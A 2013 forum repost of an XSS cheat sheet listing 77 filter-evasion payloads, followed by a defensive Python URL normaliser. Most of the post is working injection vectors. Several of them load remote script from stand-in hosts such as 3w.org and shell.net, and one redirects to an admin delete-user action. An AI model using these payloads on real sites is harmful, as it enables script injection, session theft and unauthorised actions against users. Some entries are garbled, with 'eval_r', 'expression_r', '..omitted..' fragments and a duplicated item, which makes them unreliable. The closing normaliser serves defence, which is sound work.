XSS Attack Roundup

Posted by the original poster (楼主) on 2013-4-19 19:22:37
It seems t00ls doesn't have much material on XSS, so when I saw this good stuff I copied it over; not sure whether any of you need to bookmark it.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using a JavaScript command
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>
(4) IMG tag, case insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>
(6) Malformed (defect-corrected) IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode tag (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..omitted..S')>
(9) 7-digit UTF-8 Unicode encoding, without semicolons (calculator)
<IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons (calculator)
<IMG SRC=&#x6A&#x61&#x76&#x61..omitted..&#x58&#x53&#x53&#x27&#x29>
(11) Embedded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">
(15) Embedded multi-line JavaScript injection; this is an extreme XSS example
<IMG SRC="javascript:alert('XSS')">
(16) Working around character limits (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>
(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2; null characters are basically useless domestically, because there is nowhere to exploit them
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters before the IMG tag
<IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>
(29) Escaping the JavaScript escape filter
\";alert('XSS');//
(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) Input Image
<INPUT SRC="javascript:alert('XSS');">
(32) BODY Image
<BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag
<BODY('XSS')>
(34) IMG Dynsrc
<IMG DYNSRC="javascript:alert('XSS')">
(35) IMG Lowsrc
<IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image (list style)
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBscript
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS
(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters added (1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression
<DIV STYLE="width: expression_r(alert('XSS'));">
(49) STYLE attribute split expression
<IMG STYLE="xss:expression_r(alert('XSS'))">
(50) Anonymous STYLE (made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression_r(alert('XSS'))">
(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
(52) IMG STYLE method
exppression(alert("XSS"))'>
(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed Flash that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>
(56) Using ActionScript inside Flash you can slip in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval_r(a+b+c+d);
(57) XML namespace. The HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>
(58) If your JS is filtered, you can put JS code inside an image to exploit it
<SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command, can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">
(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing symbol filtering
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>
(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>
(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding
<A HREF="http://3w.org">XSS</A>
(70) IP in decimal
<A HREF="http://3232235521">XSS</A>
(71) IP in hexadecimal
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>
(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>
(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>
(76) Absolute dot, absolute DNS
<A HREF="http://www.google.com./">XSS</A>
(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

Original source: http://fuzzexp.org/u/0day/?p=14
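Most vectors in this list work because a filter inspects the attribute value literally while the browser first decodes entities, ignores leading controls, strips tab/newline/CR/NUL inside the scheme, and folds case; items 70-76 do the same trick on the host. As an added example (not from the original post or its source), here is a Python normaliser that applies those same steps before an allowlist check on the scheme, plus a canonicaliser for the decimal/hex/octal/mixed IPv4 hosts; the function names, the allowlist and the mixed-encoding test host are my assumptions.

```python
import html
import ipaddress
import re
from urllib.parse import urlsplit

# Controls a lenient parser drops inside the scheme (items 11-14, 17-18)
# and the leading characters it ignores outright (item 19).
_SCHEME_NOISE = re.compile(r'[\x00\t\n\r]')
_LEADING_JUNK = ''.join(chr(c) for c in range(0x21))
_SCHEME_RE = re.compile(r'^([a-z][a-z0-9+.-]*):', re.I)
ALLOWED_SCHEMES = {'http', 'https', 'mailto'}   # assumed policy


def canonical_scheme(value):
    """Scheme a browser would see for an href/src value, or None if relative."""
    decoded = html.unescape(value)          # entities with or without ';' (5, 8-10)
    decoded = _SCHEME_NOISE.sub('', decoded.lstrip(_LEADING_JUNK))
    m = _SCHEME_RE.match(decoded)
    return m.group(1).lower() if m else None  # case folded (item 4)


def is_safe_url_attr(value):
    """Allowlist check: relative URLs and a few known schemes only."""
    scheme = canonical_scheme(value)
    return scheme is None or scheme in ALLOWED_SCHEMES


def canonical_host(url):
    """Resolve decimal/hex/octal/mixed IPv4 hosts (items 70-73) to dotted quads."""
    host = (urlsplit(url).hostname or '').rstrip('.')   # trailing dot: item 76
    parts = host.split('.')
    try:
        nums = [int(p[2:], 16) if p.startswith('0x')
                else int(p, 8) if len(p) > 1 and p[0] == '0'
                else int(p, 10) for p in parts]
    except ValueError:
        return host                                      # an ordinary DNS name
    n = len(nums)   # legacy rule: last part fills the remaining octets
    if n > 4 or any(p > 255 for p in nums[:-1]) or nums[-1] >= 256 ** (5 - n):
        return host
    value = nums[-1]
    for i, p in enumerate(nums[:-1]):
        value += p << (8 * (3 - i))
    return str(ipaddress.IPv4Address(value))
```

Run the check on the decoded, normalised form only; comparing the raw attribute string against a blocklist of "javascript:" is exactly what items 4-19 defeat.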